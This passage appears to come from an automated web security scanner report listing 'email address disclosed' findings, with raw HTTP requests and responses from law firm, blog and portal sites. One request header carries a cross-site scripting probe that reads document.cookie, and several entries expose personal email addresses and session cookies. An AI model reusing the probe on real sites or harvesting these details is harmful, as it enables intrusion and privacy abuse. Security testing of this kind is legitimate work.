Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 88403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<a href="mailto:pcwh@erols.com">
...[SNIP]...
<a href="mailto:pcware@tiac.net">
...[SNIP]...

17.2. http://dcregistry.com/jobs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /jobs.html

Issue detail

The following email address was disclosed in the response:

Request

GET /jobs.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:51 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 51092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</i>--Creative One Source represents the region.s top freelance web and interactive media talent. Sally Baird at (703) 299-6100 or e-mail sbaird@a-job.com<br>
...[SNIP]...

17.3. http://dcregistry.com/lawfirms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /lawfirms.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lawfirms.html HTTP/1.1
Host: dcregistry.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:08:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 69576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Washington, DC Law Firms and Legal</title>
   <LINK REL=StyleSheet HREF="http://www.dcregistry.com/style.css" TYPE="
...[SNIP]...
<a href="mailto:shawnwhittaker@hotmail.com">
...[SNIP]...
<a href="mailto:webmaster@dcregistry.com">
...[SNIP]...

17.4. http://dcregistry.com/other.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /other.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /other.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:22:08 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 159702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<a href="mailto:marco@clark.net">
...[SNIP]...
<a
               href="mailto:LISTSERV@PAHO.ORG">RITCH-L@PAHO.ORG</a>
...[SNIP]...
</b>--To subscribe: Send message to LISTSERV@PAHO.ORG body:
               SUBSCRIBE RITCH-L [YOUR NAME]</a>
...[SNIP]...

17.5. http://dcregistry.com/shopping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /shopping.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /shopping.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:22:14 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 108349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<a href="mailto:dcreg@usedbks.com">
...[SNIP]...
<a href="mailto:maxwonder@aa.action.com">
...[SNIP]...
<a href="mailto:uws333@haven.los.com">
...[SNIP]...

17.6. http://financaspessoais.blog.br/wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1
Host: financaspessoais.blog.br
Proxy-Connection: keep-alive
Referer: http://financaspessoais.blog.br/?f8184%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec42c81b1212=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239951252.1295480312.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/51; __utma=239951252.1616361418.1295480312.1295480312.1295480312.1; __utmc=239951252; __utmb=239951252.1.10.1295480312

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 23:37:43 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
Last-Modified: Tue, 09 Nov 2010 17:06:21 GMT
ETag: "1e855a-22a4-494a1c2853d40"
Accept-Ranges: bytes
Content-Length: 8868
Connection: close
Content-Type: application/x-javascript

/*
* WPaudio v3.1 (http://wpaudio.com)
* by Todd Iceton (todd@wpaudio.com)
*
* Converts an mp3 link to a simple player styled by HTML & CSS, powered by HTML5 with SoundManager2 Flash fallback
*
* Copyright 2010 Todd Iceton (email: todd@wpaudio.com)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of
...[SNIP]...

17.7. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following email address was disclosed in the response:

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:09 GMT
Etag: "6e2f3ed9101a167ccc2f760d7ec44f1e01b39cc9"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Content-Length: 30166
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...
</b> sales@gfi.com<br>
...[SNIP]...

17.8. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

17.9. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The following email address was disclosed in the response:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
<input name="email0" value="john.doe@asdf.com" type="radio">john.doe@asdf.com</li>
...[SNIP]...

17.10. http://rafael.adm.br/wp-content/themes/mainstream/includes/js/pngfix.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /wp-content/themes/mainstream/includes/js/pngfix.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/mainstream/includes/js/pngfix.js HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:16 GMT
Content-Type: application/x-javascript
Content-Length: 5786
Last-Modified: Tue, 02 Nov 2010 13:41:52 GMT
Connection: close
Expires: Fri, 18 Feb 2011 18:13:16 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.7a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

17.11. http://skaddenpractices.skadden.com/fca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fca/ HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:41 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460881320393; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=cc63b5af0e1427cc675792a20a3de3ad; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25881


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="mailto:mitchell.ettinger@skadden.com">mitchell.ettinger@skadden.com</a>
...[SNIP]...
<a href="mailto:greg.luce@skadden.com">greg.luce@skadden.com</a>
...[SNIP]...
<a href="mailto:amy.sabrin@skadden.com">amy.sabrin@skadden.com</a>
...[SNIP]...
<a href="mailto:jen.spaziano@skadden.com">jen.spaziano@skadden.com</a>
...[SNIP]...

17.12. http://skaddenpractices.skadden.com/hc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hc/ HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882188919; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=425a8e846d59a1f623a263c78af74ead; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39882


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="mailto:michael.loucks@skadden.com">michael.loucks@skadden.com</a>
...[SNIP]...
<a href="mailto:matthew.kipp@skadden.com">matthew.kipp@skadden.com</a>
...[SNIP]...
<a href="mailto:brian.mccarthy@skadden.com">brian.mccarthy@skadden.com</a>
...[SNIP]...
<a href="mailto:mark.cheffo@skadden.com">mark.cheffo@skadden.com</a>
...[SNIP]...
<a href="mailto:greg.luce@skadden.com ">greg.luce@skadden.com </a>
...[SNIP]...

17.13. http://skaddenpractices.skadden.com/sec/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sec/index.php?7ae3b&attorneys=1&inline=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Proxy-Connection: keep-alive
Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:50 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21978


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Skadden - SEC Enforcement and Compliance</title>
<link href="scripts/skadden_mini.css" rel="stylesheet" t
...[SNIP]...
<a href="mailto:colleen.mahoney@skadden.com">colleen.mahoney@skadden.com</a>
...[SNIP]...
<a href="mailto:charles.walker@skadden.com">charles.walker@skadden.com</a>
...[SNIP]...
<a href="mailto:erich.schwartz@skadden.com">erich.schwartz@skadden.com</a>
...[SNIP]...
<a href="mailto:amy.sabrin@skadden.com">amy.sabrin@skadden.com</a>
...[SNIP]...
<a href="mailto:louis.greenstein@skadden.com">louis.greenstein@skadden.com</a>
...[SNIP]...
<a href="mailto:andrew.lawrence@skadden.com">andrew.lawrence@skadden.com</a>
...[SNIP]...
<a href="mailto:gary.dibianco@skadden.com">gary.dibianco@skadden.com</a>
...[SNIP]...
<a href="mailto:richard.marmaro@skadden.com">richard.marmaro@skadden.com</a>
...[SNIP]...
<a href="mailto:jack.dicanio@skadden.com">jack.dicanio@skadden.com</a>
...[SNIP]...
<a href="mailto:matthew.sloan@skadden.com ">matthew.sloan@skadden.com </a>
...[SNIP]...
<a href="mailto:david.zornow@skadden.com">david.zornow@skadden.com</a>
...[SNIP]...
<a href="mailto:John.Carroll@skadden.com">John.Carroll@skadden.com</a>
...[SNIP]...
<a href="mailto:keith.krakaur@skadden.com ">keith.krakaur@skadden.com </a>
...[SNIP]...
<a href="mailto:lawrence.spiegel@skadden.com">lawrence.spiegel@skadden.com</a>
...[SNIP]...
<a href="mailto:David.Meister@skadden.com">David.Meister@skadden.com</a>
...[SNIP]...
<a href="mailto:christopher.gunther@skadden.com">christopher.gunther@skadden.com</a>
...[SNIP]...
<a href="mailto:steven.glaser@skadden.com">steven.glaser@skadden.com</a>
...[SNIP]...
<a href="mailto:Warren.Feldman@skadden.com">Warren.Feldman@skadden.com</a>
...[SNIP]...
<a href="mailto:jay.kasner@skadden.com">jay.kasner@skadden.com</a>
...[SNIP]...
<a href="mailto:jonathan.lerner@skadden.com">jonathan.lerner@skadden.com</a>
...[SNIP]...
<a href="mailto:christopher.malloy@skadden.com ">christopher.malloy@skadden.com </a>
...[SNIP]...
<a href="mailto:susan.saltzstein@skadden.com ">susan.saltzstein@skadden.com </a>
...[SNIP]...
<a href="mailto:robert.zimet@skadden.com">robert.zimet@skadden.com</a>
...[SNIP]...
<a href="mailto:stephen.robinson@skadden.com">stephen.robinson@skadden.com</a>
...[SNIP]...
<a href="mailto:charles.smith@skadden.com">charles.smith@skadden.com</a>
...[SNIP]...
<a href="mailto:matthew.kipp@skadden.com">matthew.kipp@skadden.com</a>
...[SNIP]...
<a href="mailto:dougherty@skadden.com ">dougherty@skadden.com </a>
...[SNIP]...
<a href="mailto:james.carroll@skadden.com ">james.carroll@skadden.com </a>
...[SNIP]...
<a href="mailto:james.lyons@skadden.com">james.lyons@skadden.com</a>
...[SNIP]...
<a href="mailto:garrett.waltzer@skadden.com">garrett.waltzer@skadden.com</a>
...[SNIP]...

17.14. http://twittercounter.com/rafaelp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twittercounter.com
Path:   /rafaelp

Issue detail

The following email address was disclosed in the response:

Request

GET /rafaelp HTTP/1.1
Host: twittercounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:07 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20381


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="mailto:sam@twittercounter.com" rel="nofollow" title="Get in contact with TwitterCounter">
...[SNIP]...

17.15. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /about_the_firm_pro_bono_our_commitment.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="mailto:Marsha.Tucker@aporter.com">
...[SNIP]...

17.16. http://www.arnoldporter.com/events.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="mailto:events@aporter.com">events@aporter.com</a>
...[SNIP]...

17.17. http://www.arnoldporter.com/globals_privacy_policy.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /globals_privacy_policy.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /globals_privacy_policy.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="mailto:mailings.administrator@aporter.com">mailings.administrator@aporter.com</a>
...[SNIP]...
<a href="mailto:Stephen.DiGennaro@aporter.com">Stephen.DiGennaro@aporter.com</a>
...[SNIP]...

17.18. http://www.cov.com/en-US/regions/middle_east/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /en-US/regions/middle_east/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en-US/regions/middle_east/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions | Middle East</titl
...[SNIP]...
</A>Malik.Dahlan@quraysh.com <BR>
...[SNIP]...
</div>rhaney@cov.com


<br />
...[SNIP]...
</div>plaveran@cov.com


<br />
...[SNIP]...
</div>bwilson@cov.com


<br />
...[SNIP]...

17.19. http://www.cov.com/health_care/health_care_reform/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cov.com
Path:   /health_care/health_care_reform/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /health_care/health_care_reform/ HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39084


